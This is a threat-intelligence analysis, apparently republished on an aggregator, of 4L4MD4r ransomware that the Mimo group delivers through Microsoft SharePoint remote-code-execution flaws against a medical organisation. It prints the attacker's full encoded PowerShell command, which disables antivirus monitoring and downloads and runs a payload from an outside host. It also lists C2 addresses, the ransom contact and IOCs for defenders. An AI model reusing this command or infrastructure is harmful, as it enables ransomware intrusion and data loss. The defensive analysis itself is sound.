奇安信威胁情报中心 08月16日
宗教符号武器化,mimo团伙利用Microsoft SharePoint RCE漏洞投递4L4MD4r勒索软件
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

奇安信红雨滴团队发现某医疗客户外网SharePoint服务器被入侵,恶意PowerShell命令被天擎拦截。进一步分析发现,攻击者使用了基于Golang编写的4L4MD4r勒索软件,该软件与Mimo攻击团伙有关,该团伙以经济利益为主要动机。文章详细介绍了该勒索软件的样本分析过程,包括其利用CVE-2025-49704等漏洞、下载并执行payload、加密文件以及生成勒索信等行为。同时,也指出目前已有安全产品能够检测此类攻击,并提供了相关的IOC信息。

💡 4L4MD4r勒索软件利用了Microsoft SharePoint服务器的RCE漏洞(CVE-2025-49704/CVE-2025-49706/CVE-2025-53770/CVE-2025-53771),成功入侵了某医疗客户部署在外网的SharePoint服务器。攻击者首先执行了恶意的PowerShell命令,该命令被天擎安全软件拦截,随后分析发现其使用了基于Golang开发的4L4MD4r勒索软件,该软件被认为隶属于以经济利益为驱动的Mimo攻击团伙。

🚀 样本分析显示,4L4MD4r勒索软件在内存中解密最终载荷,并申请内存来装载解密的PE文件,最后新建线程执行。该软件具备反调试功能,若检测到超时则终止运行。其核心功能包括获取计算机名、生成ID和加密密钥,并将这些信息加密后上传至指定服务器。成功上传后,软件开始加密文件,被加密文件的原始文件名会被转换为Base64编码,并在桌面生成勒索信DECRYPTION_INSTRUCTIONS.html及被加密文件列表NCRYPTED_LIST.html。

💰 攻击者通过加密文件后,要求受害者联系邮箱m4_cruise@proton.me并使用.4l4md4r后缀。文章还揭示了用于加密JSON的公钥,并查询了攻击者提供的BTC钱包,发现截至目前没有受害者支付赎金的记录。这表明该勒索软件的攻击尚未取得经济上的成功。

🛡️ 奇安信威胁情报中心的解决方案,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC和奇安信态势感知等,均已具备对此类攻击的精确检测能力。建议政企客户在办公区和服务器区同时部署天擎,并开启“六合”高级威胁防御引擎,以有效抵御此类威胁。

原创 红雨滴团队 2025-07-30 17:04 北京

奇安信威胁情报中心红雨滴团队观察到某医疗客户部署在外网的SharePoint服务器被入侵,执行恶意powershell被天擎拦截,后续分析发现基于golang的4L4MD4r勒索软件,该武器似乎属于mimo团伙,一个具有经济动机的威胁行为者

背景

2025 年 7 月,Microsoft SharePoint 服务器曝出一个严重的远程代码执行(RCE)漏洞(CVE-2025-49704/CVE-2025-49706/CVE-2025-53770/CVE-2025-53771),这些漏洞已被黑客组织广泛利用,影响全球数万台服务器,奇安信威胁情报中心红雨滴团队第一时间对该漏洞进行分析并在终端侧进行监控,终于在 7 月 27 日观察到某医疗客户部署在外网的 SharePoint 服务器被入侵,执行了恶意的 powershell 命令,但是被天擎拦截,后续分析拿到了 golang 语言编写的 4L4MD4r 勒索软件,函数名带有浓厚的宗教色彩,根据友商的报告[1],该武器似乎隶属于 mimo 攻击团伙,一个具有经济动机的威胁行为者。

我们建议政企客户在办公区和服务器区同时部署天擎,在开启天擎“六合”高级威胁防御引擎的情况下可以该漏洞进行拦截。

样本分析

我们观察到的进程链如下:

父父进程

c:\windows\system32\inetsrv\w3wp.exe -ap   "SharePoint - 80" -v "v4.0" ****

父进程

C:\Windows\System32\cmd.exe

目标进程

powershell.exe -exec bypass -enc   UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAIAAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgACQAdABlAG0AcABmAGkAbABlACAAKwA9ACAAJwAuAGUAeABlACcAOwAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAGMAZQAuAHQAaABlAGkAbgBuAG8AdgBhAHQAaQBvAG4AZgBhAGMAdABvAHIAeQAuAGkAdAAvAHMAdABhAHQAaQBjAC8ANABsADQAbQBkADQAcgAuAGUAeABlACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=


解码后的内容如下,主要功能为下载者。

从意大利跳板网站上下载 payload 并执行,但被天擎拦截。

跳板URL

https://ice.theinnovationfactory.it/static/4l4md4r.exe

基于VT数据,我们获取到了 4l4md4r.exe

4l4md4r.exe 是由 golang 语言编写的新型勒索软件,函数名带有非常浓烈的宗教色彩:

4L4MD4R ransomware 似乎是 mino 组织首次投递,首先会在内存中解密最终载荷。

之后会申请内存来装载解密的 PE 文件。

最后新建线程执行。

解密加载的 PE 文件是 4l4md4r 勒索软件,首先会进行时间检测用于反调试,超时会终止运行。

之后会获取计算机名,并生成一个 ID 和 enckey(用于加密文件),合并为一个 json。

将该 json 内容加密后通过 POST 方式上传到 http://bpp.theinnovationfactory.it:445。

如果发送失败超过三次,同样会终止运行。

上传成功后开始进行加密工作,通过 enckey 加密文件,被加密的文件名称会变为原来文件名的 base64 形式。

文件加密完毕后会在桌面生成勒索信 DECRYPTION_INSTRUCTIONS.html 和一个被加密文件的列表 NCRYPTED_LIST.html。

勒索信内容如下:

    联系邮箱:m4_cruise@proton.me

    加密后缀:.4l4md4r

用于加密 json 的公钥如下:

经过查询,攻击者提供的 BTC 钱包有 40 次转账记录,并没有出现金额为0.005BTC 的交易记录,这意味着截止到目前为止,没有受害者向 4l4md4r 勒索软件支付赎金。

总结

目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。

IOC

MD5:

90f71cb5df71ae3845ff81edd776b287

C2:

hxxps://ice.theinnovationfactory.it/static/4l4md4r.exe

bpp.theinnovationfactory.it:445

参考链接

[1]. https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/

点击阅读原文ALPHA 8.3

即刻助力威胁研判

阅读原文

跳转微信打开

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

4L4MD4r 勒索软件 SharePoint Golang Mimo团伙
相关文章